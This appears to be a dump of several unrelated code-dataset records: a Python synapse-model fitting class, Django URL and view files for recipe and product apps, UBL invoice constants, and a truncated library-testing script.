['df-', 'dx-']\n templates, pre, delim, post = _frmt_vars(format_spec)\n disped = [templates[k] for k in disp]\n return 
pre + delim.join(disped).format(**self.info) + post\n\n def __str__(self) -> str:\n \"\"\"Printing info\"\"\"\n return self.__format__('')\n\n def __repr__(self) -> str:\n \"\"\"Accurate representation of object\"\"\"\n rpr = type(self).__name__ + \"(\\n\"\n with np.printoptions(threshold=20, precision=2):\n rpr += \" data = \"\n rpr += repr(self.data).replace(\"\\n\", \"\\n\" + \" \" * 11) + \",\\n\"\n rpr += \" model = \"\n rpr += repr(self.est).replace(\"\\n\", \"\\n\" + \" \" * 12) + \",\\n\"\n rpr += \" info = \"\n rpr += repr(self.info).replace(\", \", \",\\n\" + \" \" * 13) + \",\\n\"\n rpr += \")\"\n return rpr\n\n def calc_thresh(self) -> None:\n \"\"\"Calculate thresholds for stopping\n \"\"\"\n x_scale = _ag.default_eval(self.info['x_scale'], self.est.norm)\n y_scale = _ag.default(self.info['y_scale'], self.info['nlike'])\n self.info['x_thresh'] = self.opt.atolx + self.opt.rtolx * x_scale\n self.info['y_thresh'] = self.opt.atoly + self.opt.rtoly * y_scale\n\n def check_thresh(self) -> bool:\n \"\"\"Check if last update was below threshold\n \"\"\"\n return (self.info['dmodel'] < self.info['x_thresh'] and\n abs(self.info['dlike']) < self.info['y_thresh'])\n\n def valid(self) -> bool:\n \"\"\"Check that current model estimate is valid\"\"\"\n return not self.est.nmodel and _si.valid_values(self.est)\n\n @abc.abstractmethod\n def update_info(self) -> None:\n \"\"\"Calculate stats for termination and display.\n\n Subclass must update `self.info['nlike']` and `self.info['dlike']`.\n \"\"\"\n self.info['dmodel'] = (self.est - self.prev_est).norm()\n\n @abc.abstractmethod\n def update_fit(self) -> None:\n \"\"\"Perform a single update of the model\"\"\"\n\n @abc.abstractmethod\n def est_occ(self, ind: _ps.Inds) -> la.lnarray:\n \"\"\"Current estimate of state occupation\n\n Parameters\n ----------\n ind : Tuple[Union[int, slice], ...]\n Time, experiment indices/slices to plot\n\n Returns\n -------\n data : lnarray, ([E,]T,M) float[0:1] or ([E,]T) int[0:M]\n Estimate of state occupation\n \"\"\"\n\n def plot_occ(self, handle: _ps.Handle, ind: _ps.Inds, **kwds) -> _ps.Plot:\n \"\"\"Plot current estimate of state occupation\n\n Parameters\n ----------\n handle : Union[Axes, Image, Line]\n Axes to plot on, or Image/Lines to update with new data\n ind : Tuple[Union[int, slice], ...]\n Time, experiment indices/slices to plot\n\n Returns\n -------\n imh : Union[Image, Line]\n Image/Line objects for the plots\n \"\"\"\n # (T,M) or (T,)\n state_prob = self.est_occ(ind)\n kwds['line'] = state_prob.ndim == 1\n return _ps.set_plot(handle, state_prob.t, **kwds)\n\n def init(self) -> List[Any]:\n \"\"\"Prepare for first iteration.\n\n Returns\n -------\n output : Any\n Whatever the callback returns.\n \"\"\"\n self.info['nit'] = 0\n self.info['result'] = 0\n return self.callback(self, 0)\n\n def step(self, step_num: int) -> List[Any]:\n \"\"\"One update step\n\n Parameters\n ----------\n step_num : int\n Number of steps completed.\n\n Returns\n -------\n output : Any\n Whatever the callback returns.\n \"\"\"\n self.info['nit'] = step_num + 1\n self.prev_est = self.est.copy()\n self.update_fit()\n if not self.valid():\n self.info['result'] = -1\n return []\n self.update_info()\n self.calc_thresh()\n self.prev_est = None\n if self.check_thresh():\n self.info['result'] = 1\n return self.callback(self, 2)\n if self.info['nit'] == self.opt.max_it:\n return self.callback(self, 2)\n if self.info['nit'] % self.opt.disp_step == 0:\n return self.callback(self, 1)\n return []\n\n def run(self, callback: 
Optional[Callback] = None) -> int:\n \"\"\"Run the synapse fitter until termination conditions are met\n\n Parameters\n ----------\n callback : Callable[[self, int]->List], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n It should return an empty list unless it is involved in an\n animation, in which case it should return a list of updated artists\n\n Returns\n -------\n result : int\n Flag for the outcome:\n -1: Error, invalid model generated.\n 0: Failure, maximum iterations reached.\n 1: Success, change in log-likelihood and model below threshold.\n \"\"\"\n count = _it.undcount if self.opt.disp_each else _it.dcount\n self.callback = _ag.default(callback, self.callback)\n self.init()\n for i in count('iteration', self.opt.max_it,\n disp_step=self.opt.disp_step):\n self.step(i)\n if self.info['result']:\n break\n return self.info['result']\n\n @classmethod\n def rerun(cls, saved: Dict[str, la.lnarray],\n callback: Callback = print_callback, **kwds\n ) -> SynapseFitter:\n \"\"\"Recreate a fitter from its saved state.\n\n Parameters\n ----------\n saved : Dict[str, la.lnarray]\n The `info` dictionary of a `RecordingCallback`.\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n Other keywords passed to `cls`.\n\n Returns\n -------\n fitter : SynapseFitter\n The recreated fitter.\n \"\"\"\n kwds['callback'] = callback\n est = _si.from_elements(saved['est'][0], saved['frc'], saved['rdo'])\n if 'states' in saved:\n data = _ps.SimPlasticitySequence(saved['plast_type'],\n saved['readouts'],\n saved['states'])\n else:\n data = _ps.PlasticitySequence(saved['plast_type'],\n saved['readouts'])\n if 'truth' in saved:\n truth = _si.from_elements(saved['truth'], saved['frc'],\n saved['rdo'])\n kwds['truth'] = truth\n return cls(data, est, **kwds)\n\n\n# =============================================================================\n# Fitter with ground truth\n# =============================================================================\n\n\nclass GroundedFitter(SynapseFitter):\n \"\"\"SynapseFitter where groud-truth is known.\n\n Parameters\n ----------\n data : SimPlasticitySequence\n The simulated data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model.\n truth : SynapseIdModel\n The model used to generate `data`.\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n Other keywords added to `self.opt` (see `SynapseFitter`).\n\n Statistics\n ----------\n true_like : float\n Negative log-likelihood of `data` given `truth`.\n true_dmodel : float\n Distance between `truth` and `model`.\n true_dlike : float\n `nlike - true_like`.\n nlike : float\n Negative log-likelihood of `data` given `model`.\n dlike : float\n Decrease in negative log-likelihood of `data` given `model`.\n dmodel : float\n Distance between `model` and `prev_model`.\n nit : int\n Number of iterations.\n x_thresh : float\n Threshold on `dmodel` for termination.\n y_thresh : float\n Threshold on `dlike` for termination.\n x_scale : float or None\n Typical scale for `dmodel`. 
By default, `None` -> `truth.norm()`.\n y_scale : float or None\n Typical scale for `dlike`. By default, `None` -> `true_like`.\n result : int\n Flag for the outcome of fitting:\n -1: Error, invalid model generated.\n 0: Failure, maximum iterations reached.\n 1: Success, change in log-likelihood and model below threshold.\n All of the above are stored in `self.info`.\n\n See Also\n --------\n SynapseFitter.\n SynapseFitOptions.\n \"\"\"\n data: _ps.SimPlasticitySequence\n truth: _si.SynapseIdModel\n\n def __init__(self, data: _ps.SimPlasticitySequence,\n est: _si.SynapseIdModel, truth: _si.SynapseIdModel,\n callback: Callback = print_callback,\n **kwds) -> None:\n \"\"\"SynapseFitter where ground-truth is known.\n\n Parameters\n ----------\n data : SimPlasticitySequence\n The data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model.\n truth : SynapseIdModel\n The model used to generate `data`.\n\n Subclass should set `self.info['true_like', 'y_scale', 'true_dlike']`.\n \"\"\"\n super().__init__(data, est, callback, **kwds)\n self.truth = truth\n self.info.update(true_dmodel=(self.truth - self.est).norm(),\n x_scale=self.truth.norm())\n\n def __format__(self, format_spec: str) -> str:\n \"\"\"Printing info about state of fitter\n\n Parameters\n ----------\n format_spec : str\n If it begins `'tex'`, produces a LaTeX equation environment.\n If it ends with `','`, the first digit is\n interpreted as `pos` and the second as `verbose`.\n\n For `pos`:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n For `verbose`:\n 1: print summary,\n 2: print detailed.\n \"\"\"\n format_spec, pos, verbose = _get_pos_verbosity(self, format_spec)\n disp = ['t', 'tr', 'fit', 'trx']\n if not verbose and pos == 1 and not format_spec:\n del disp[1]\n if verbose and pos:\n disp += ['dtr', 'df', 'dx']\n elif verbose and format_spec:\n disp += ['dtr', 'df-', 'dx-']\n templates, pre, delim, post = _frmt_vars(format_spec)\n disped = [templates[k] for k in disp]\n return pre + delim.join(disped).format(**self.info) + post\n\n def __repr__(self) -> str:\n \"\"\"Accurate representation of object\"\"\"\n rpr = super().__repr__()\n insert = \" truth = \"\n with np.printoptions(threshold=20, precision=2):\n insert += repr(self.truth).replace(\"\\n\", \"\\n\" + \" \" * 12) + \",\\n\"\n ind = rpr.find(\" info = \")\n rpr = rpr[:ind] + insert + rpr[ind:]\n return rpr\n\n def calc_thresh(self) -> None:\n \"\"\"Calculate thresholds for stopping\"\"\"\n if self.info['x_thresh'] == 0 or self.info['y_thresh'] == 0:\n super().calc_thresh()\n\n @abc.abstractmethod\n def update_info(self) -> None:\n \"\"\"Calculate info for termination.\n\n Subclass must update `self.info['nlike', 'dlike', 'true_dlike']`.\n \"\"\"\n super().update_info()\n self.info['true_dmodel'] = (self.truth - self.est).norm()\n\n\n# =============================================================================\nCallback = Callable[[SynapseFitter, int], List[Any]]\n", "repo_name": "ganguli-lab/Complex_Synapse", "sub_path": "Code/Python/complex_synapse/identify/fit_synapse.py", "file_name": "fit_synapse.py", "file_ext": "py", "file_size_in_byte": 26016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 34, "usage_type": "name"}, 
{"api_name": "numpy.isfinite", "line_number": 68, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 78, "usage_type": "name"}, {"api_name": "sl_py_tools.options_classes.Options", "line_number": 110, "usage_type": "attribute"}, {"api_name": "sl_py_tools.options_classes", "line_number": 110, "usage_type": "name"}, {"api_name": "sl_py_tools.options_classes.Attrs", "line_number": 157, "usage_type": "attribute"}, {"api_name": "sl_py_tools.options_classes", "line_number": 157, "usage_type": "name"}, {"api_name": "sl_py_tools.options_classes.Attrs", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sl_py_tools.options_classes", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 243, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 253, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.PlasticitySequence", "line_number": 333, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 333, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 334, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 334, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 335, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 335, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 335, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 337, "usage_type": "name"}, {"api_name": "numbers.Number", "line_number": 337, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.PlasticitySequence", "line_number": 343, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 343, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 343, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 365, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 366, "usage_type": "attribute"}, {"api_name": "numpy.printoptions", "line_number": 407, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks.default_eval", "line_number": 420, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks", "line_number": 420, "usage_type": "name"}, {"api_name": "sl_py_tools.arg_tricks.default", "line_number": 421, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks", "line_number": 421, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.valid_values", "line_number": 433, "usage_type": "call"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 433, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 435, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 443, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.Inds", "line_number": 448, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 448, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 447, "usage_type": "attribute"}, {"api_name": "numpy_linalg.lnarray", "line_number": 448, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.Handle", "line_number": 462, "usage_type": "attribute"}, {"api_name": 
"complex_synapse.identify.plast_seq", "line_number": 462, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.Inds", "line_number": 462, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.set_plot", "line_number": 480, "usage_type": "call"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 480, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.Plot", "line_number": 462, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 482, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 482, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 494, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 494, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 525, "usage_type": "name"}, {"api_name": "sl_py_tools.iter_tricks.undcount", "line_number": 547, "usage_type": "attribute"}, {"api_name": "sl_py_tools.iter_tricks", "line_number": 547, "usage_type": "name"}, {"api_name": "sl_py_tools.iter_tricks.dcount", "line_number": 547, "usage_type": "attribute"}, {"api_name": "sl_py_tools.arg_tricks.default", "line_number": 548, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks", "line_number": 548, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 558, "usage_type": "name"}, {"api_name": "numpy_linalg.lnarray", "line_number": 558, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id.from_elements", "line_number": 581, "usage_type": "call"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 581, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.SimPlasticitySequence", "line_number": 583, "usage_type": "call"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 583, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.PlasticitySequence", "line_number": 587, "usage_type": "call"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 587, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.from_elements", "line_number": 590, "usage_type": "call"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 590, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.SimPlasticitySequence", "line_number": 656, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 656, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 657, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 657, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.SimPlasticitySequence", "line_number": 659, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 659, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 660, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 660, "usage_type": "name"}, {"api_name": "numpy.printoptions", "line_number": 715, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 726, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 737, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 737, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 737, "usage_type": "name"}]} +{"seq_id": "29570090272", "text": "from django.urls 
import path\n\nfrom photos.views import PhotoUploadApi, PhotoMetaListApi, PhotoListApi, PhotoRetrieveApi\n\n\nphoto_patterns = [\n path('photo/upload/', PhotoUploadApi.as_view(), name='photo_upload'),\n path('photo//', PhotoRetrieveApi.as_view(), name='photo'),\n path('photos/', PhotoListApi.as_view(), name='photos'),\n path('photos/detailed/', PhotoMetaListApi.as_view(), name='photos_detailed'),\n]\n\nurlpatterns = photo_patterns", "repo_name": "unkn1w/photo_manager", "sub_path": "backend/photos/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "photos.views.PhotoUploadApi.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "photos.views.PhotoUploadApi", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "photos.views.PhotoRetrieveApi.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "photos.views.PhotoRetrieveApi", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "photos.views.PhotoListApi.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "photos.views.PhotoListApi", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "photos.views.PhotoMetaListApi.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "photos.views.PhotoMetaListApi", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "36925728432", "text": "from collections import OrderedDict\n\nDEFAULT_ENCODING = \"utf-8\"\nFALLBACK_ENCODING = \"utf-8-sig\"\n\n# Constants used in naming and formatting of intermediate JSON.\nATTRIBUTE_PREFIX = \"_\"\nVALUE_ATTRIBUTE = \"__text\"\n\nATTRIBUTE = \"@{}\".format\n\n# Names of special intermediate JSON elements.\nXML_NAMESPACES = \"@xmlns\"\nTEXT_CONTENT = \"#text\"\n\n# UBL Billing 3 Invoice intermediate JSON constants.\nBILLING_NAMESPACE = (\n \"urn:cen.eu:en16931:2017#compliant#urn:fdc:peppol.eu:2017:poacc:billing:3.0\"\n)\nPROFILE_NAMESPACE = \"urn:fdc:peppol.eu:2017:poacc:billing:01:1.0\"\nINVOICE_NAMESPACE = \"urn:oasis:names:specification:ubl:schema:xsd:Invoice-2\"\nCAC_NAMESPACE = (\n \"urn:oasis:names:specification:ubl:schema:xsd:CommonAggregateComponents-2\"\n)\nCBC_NAMESPACE = \"urn:oasis:names:specification:ubl:schema:xsd:CommonBasicComponents-2\"\n\nNAMESPACE = \"{}:{{}}\".format\nCBC = NAMESPACE(\"cbc\").format\nCAC = NAMESPACE(\"cac\").format\n\nNAMESPACES = OrderedDict(\n [(\"cac\", CAC_NAMESPACE), (\"cbc\", CBC_NAMESPACE), (\"\", INVOICE_NAMESPACE)]\n)\n\nUBL_INVOICE_ROOT = OrderedDict(\n [\n (\n \"Invoice\",\n OrderedDict(\n [\n (XML_NAMESPACES, NAMESPACES),\n (CBC(\"CustomizationID\"), BILLING_NAMESPACE),\n (CBC(\"ProfileID\"), PROFILE_NAMESPACE),\n ]\n ),\n )\n ]\n)\n\n\nCBC_ELEMENTS = (\n \"AccountingCost\",\n \"ActualDeliveryDate\",\n \"AdditionalStreetName\",\n \"AllowanceChargeReason\",\n \"AllowanceChargeReasonCode\",\n \"AllowanceTotalAmount\",\n \"Amount\",\n \"BaseAmount\",\n \"BaseQuantity\",\n \"BuyerReference\",\n \"ChargeIndicator\",\n \"ChargeTotalAmount\",\n \"CityName\",\n \"CompanyID\",\n \"CompanyLegalForm\",\n \"CountrySubentity\",\n \"CustomizationID\",\n \"Description\",\n \"DocumentCurrencyCode\",\n \"DocumentDescription\",\n 
\"DocumentType\",\n \"DocumentTypeCode\",\n \"DueDate\",\n \"ElectronicMail\",\n \"EmbeddedDocumentBinaryObject\",\n \"EndDate\",\n \"EndpointID\",\n \"HolderName\",\n \"ID\",\n \"IdentificationCode\",\n \"InvoicedQuantity\",\n \"InvoiceTypeCode\",\n \"IssueDate\",\n \"Line\",\n \"LineExtensionAmount\",\n \"LineID\",\n \"MultiplierFactorNumeric\",\n \"Name\",\n \"NetworkID\",\n \"Note\",\n \"PayableAmount\",\n \"PayableRoundingAmount\",\n \"PaymentID\",\n \"PaymentMeansCode\",\n \"Percent\",\n \"PostalZone\",\n \"PrepaidAmount\",\n \"PriceAmount\",\n \"PrimaryAccountNumberID\",\n \"ProfileID\",\n \"RegistrationName\",\n \"SalesOrderID\",\n \"StartDate\",\n \"StreetName\",\n \"TaxableAmount\",\n \"TaxAmount\",\n \"TaxCurrencyCode\",\n \"TaxExclusiveAmount\",\n \"TaxExemptionReason\",\n \"TaxExemptionReasonCode\",\n \"TaxInclusiveAmount\",\n \"TaxPointDate\",\n \"Telephone\",\n \"URI\",\n \"Value\",\n)\n", "repo_name": "dimitern/json_to_ubl_xml_transformer", "sub_path": "json_to_ubl_xml_transformer/constants.py", "file_name": "constants.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.OrderedDict", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "14261068938", "text": "from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\nfrom users.views import SpecialUserViewSet\nfrom cookbook.views import (DownloadShoppingCartViewSet,\n FavoriteRecipesViewSet, IngredientViewSet,\n RecipesViewSet, SbscrptViewSet,\n ShoppingCartViewSet, SubscribeViewSet, TagViewSet)\n\napp_name = 'cookbook'\n\nrouter = DefaultRouter()\nrouter.register(\n 'users/subscriptions',\n SbscrptViewSet,\n basename='subscriptions'\n)\nrouter.register('users', SpecialUserViewSet, basename='users-list')\nrouter.register('tags', TagViewSet, basename='tags-list')\nrouter.register('ingredients', IngredientViewSet, basename='ingredients-list')\nrouter.register(\n r'users/(?P\\d+)/subscribe',\n SubscribeViewSet,\n basename='subscribe'\n)\nrouter.register(\n 'recipes/download_shopping_cart',\n DownloadShoppingCartViewSet,\n basename='download_shopping_cart'\n)\nrouter.register(\n r'recipes/(?P\\d+)/shopping_cart',\n ShoppingCartViewSet,\n basename='shopping_cart'\n)\nrouter.register(\n r'recipes/(?P\\d+)/favorite',\n FavoriteRecipesViewSet,\n basename='favorite'\n)\nrouter.register('recipes', RecipesViewSet, basename='recipes-list')\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('auth/', include('djoser.urls.authtoken')),\n]\n", "repo_name": "Gena40/foodgram-project-react", "sub_path": "backend/food_assistance/cookbook/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 11, "usage_type": "call"}, {"api_name": "cookbook.views.SbscrptViewSet", "line_number": 14, "usage_type": "argument"}, {"api_name": "users.views.SpecialUserViewSet", "line_number": 17, "usage_type": "argument"}, {"api_name": "cookbook.views.TagViewSet", "line_number": 18, "usage_type": "argument"}, {"api_name": "cookbook.views.IngredientViewSet", "line_number": 19, "usage_type": "argument"}, {"api_name": 
"cookbook.views.SubscribeViewSet", "line_number": 22, "usage_type": "argument"}, {"api_name": "cookbook.views.DownloadShoppingCartViewSet", "line_number": 27, "usage_type": "argument"}, {"api_name": "cookbook.views.ShoppingCartViewSet", "line_number": 32, "usage_type": "argument"}, {"api_name": "cookbook.views.FavoriteRecipesViewSet", "line_number": 37, "usage_type": "argument"}, {"api_name": "cookbook.views.RecipesViewSet", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "75010861633", "text": "from django.shortcuts import render\nfrom .models import Product, Category\n\n\ndef home(request, category_slug=None):\n if category_slug != None:\n category_page = Category.objects.get(slug=category_slug)\n products = Product.objects.filter(category=category_page, available=True)\n else:\n category_page = None\n products = Product.objects.all()\n context = {\"products\": products, \"category_page\": category_page}\n return render(request, \"products/home.html\", context)\n\n\ndef product(request, category_slug, product_slug):\n product = Product.objects.get(category__slug=category_slug, slug=product_slug)\n context = {\"product\": product}\n return render(request, \"products/product.html\", context)\n\n\ndef search(request):\n products = Product.objects.filter(name__contains=request.GET[\"name\"])\n context = {\"products\": products}\n return render(request, \"products/home.html\", context)\n", "repo_name": "tonyvives/django_store", "sub_path": "products/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.Category.objects.get", "line_number": 7, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 8, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Product.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Product.objects.get", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "30334494059", "text": "\"\"\" chill.py:\r\n Description: relax and chill the library 
is fine\r\n\r\n Created by : Daniel Jaramillo\r\n Creation Date: 11/01/2019\r\n Modified by: Date:\r\n All rights(C) reserved to Teoco\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport argparse\r\nimport os_tools\r\nimport base64\r\nimport glob\r\nimport time\r\nfrom HlxTools import HlxTools\r\nfrom LoggerInit import LoggerInit\r\nfrom Partrans import Partrans\r\nfrom threading import Thread\r\nfrom TestReport import TestReportJunit\r\nfrom datetime import datetime\r\nfrom ParseHLD import ParseHLD\r\n\r\n\r\ndef parse_args():\r\n \"\"\"\r\n Parse input arguments\r\n \"\"\"\r\n global conf_file\r\n app_logger=logger.get_logger(\"parse_args\")\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument('-c','--conf',\r\n \thelp='Configuration Json file',\r\n \trequired=True,\r\n \ttype=str)\r\n\r\n args=parser.parse_args()\r\n conf_file=args.conf\r\n\r\n if not os.path.exists(conf_file):\r\n app_logger.error('{conf_file} not found'.format(conf_file=conf_file))\r\n sys.exit(1)\r\n\r\ndef main():\r\n app_logger=logger.get_logger(\"main\")\r\n global conf_file\r\n parse_args()\r\n\r\n DB_USER=os.environ['DB_USER']\r\n DB_PASSWORD=base64.b64decode(os.environ['DB_PASSWORD'])\r\n ORACLE_SID=os.environ['ORACLE_SID']\r\n DB_HOST=os.environ['DB_HOST']\r\n\r\n partrans=Partrans(conf_file,DB_USER,DB_PASSWORD,ORACLE_SID,DB_HOST) \r\n #Parse hld\r\n parse_hld=ParseHLD(partrans.configuration['HLD'])\r\n parse_hld.load_hld()\r\n #Parse and transform data\r\n partrans.parse_data(parse_hld)\r\n\r\n #Simulate Data using helix\r\n LIBRARY_NAME=partrans.configuration['library']\r\n MASK=partrans.configuration['input_rd_mask']\r\n LOCAL_DIR=partrans.configuration['input_rd']\r\n INSTANCE_ID=\"1717\"\r\n curr_datetime=datetime.now().strftime(\"%Y_%m_%d_%H_%M\")\r\n\r\n\r\n TEST_REPORT_FILE_JUNIT=\"test_reports/{LIBRARY_NAME}_test_report.xml\"\\\r\n .format(curr_datetime=curr_datetime,LIBRARY_NAME=LIBRARY_NAME)\r\n\r\n #Validate environment variables\r\n if 'DVX2_IMP_DIR' not in os.environ:\r\n app_logger.error('DVX2_IMP_DIR env variable not defined')\r\n sys.exit(1)\r\n DVX2_IMP_DIR=os.environ['DVX2_IMP_DIR']\r\n if 'DVX2_LOG_DIR' not in os.environ:\r\n app_logger.error('DVX2_LOG_DIR env variable not defined')\r\n sys.exit(1)\r\n DVX2_LOG_DIR=os.environ['DVX2_LOG_DIR']\r\n DVX2_LOG_FILE=os.path.join(DVX2_LOG_DIR,\\\r\n \"dvx2_{LIBRARY_NAME}_{INSTANCE_ID}.log\"\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME,INSTANCE_ID=INSTANCE_ID))\r\n #Make log file empty\r\n open(DVX2_LOG_FILE, 'w').close()\r\n #Validate if Library exists\r\n connect_file=os.path.join(DVX2_IMP_DIR,'scripts',LIBRARY_NAME+'.connect')\r\n if not os.path.isfile(connect_file):\r\n app_logger.error('Library {LIBRARY_NAME} does not exist'\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME))\r\n 